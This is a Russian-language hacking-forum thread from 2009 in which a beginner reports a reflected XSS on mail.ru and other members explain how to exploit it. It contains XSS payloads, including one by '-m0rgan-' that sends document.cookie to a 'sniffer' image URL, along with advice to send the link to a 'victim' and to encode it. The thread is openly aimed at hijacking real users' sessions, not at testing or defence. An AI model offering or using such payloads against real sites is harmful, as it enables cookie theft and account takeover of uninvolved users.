пассивная xss на mail.ru, вопрос

Discussion in 'Песочница' started by Seshh, 8 Mar 2009.

  1. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Я тут лазил по mail.ru искал XSS, вылитило следующее окно. На то, что было забито в скрипт как предупреждение это не похоже. Так, что это кто нить знает ?

    [​IMG]
     
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    >>Так, что это кто нить знает ?
    пасвная XSS
     
  3. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Скрипт следующий: "><script>alert(XSS)</script>, а выскочела такая бойда почему ?
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    ты чет напутал!
    или скрипт нетот пихнул и незаметил...
    То что на картинке - результат действия следуйщего скриптк:
    Code:
    "><script>alert(document.cookie)</script>
     
  5. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Блин, да ты прав я именно этим скриптом и пробовал.
    А через эту уизвимость куки можно пробивать ?
     
  6. needle

    needle New Member

    Joined:
    4 Nov 2008
    Messages:
    26
    Likes Received:
    4
    Reputations:
    0
    просиш жертву зделать также как и ты зделал с етим скриптом "><script>alert(document.cookie)</script>
     
  7. Failure

    Failure Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    179
    Likes Received:
    46
    Reputations:
    16
    мочишь xD, искать xss и даже не знать что это и как заюзать, тебе сюда
    ну раз спросил то отвечу - да, угнать кукисы можно
     
  8. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    и что?

    она посмотрит на свои куки=///////

    ТС
    кидаеш жертве линк с яваскриптом в котором будет (сниффер+document.cookie)
    и жди куки)
    например что то типа:
    '><script>img = new Image();img.src="снифферкартинко"+document.cookie;</script>
     
    #8 -m0rgan-, 8 Mar 2009
    Last edited: 8 Mar 2009
  9. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Спасибо, я тока учусь ))
     
  10. [dei]

    [dei] Active Member

    Joined:
    24 Nov 2008
    Messages:
    171
    Likes Received:
    112
    Reputations:
    5
    только закодировать не забудь
     
  11. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Дальше я знаю что делать. Я спросил, чтобы мои действия все не зря были. Ато кинеш жертве, а не работает. Всем Спасибо !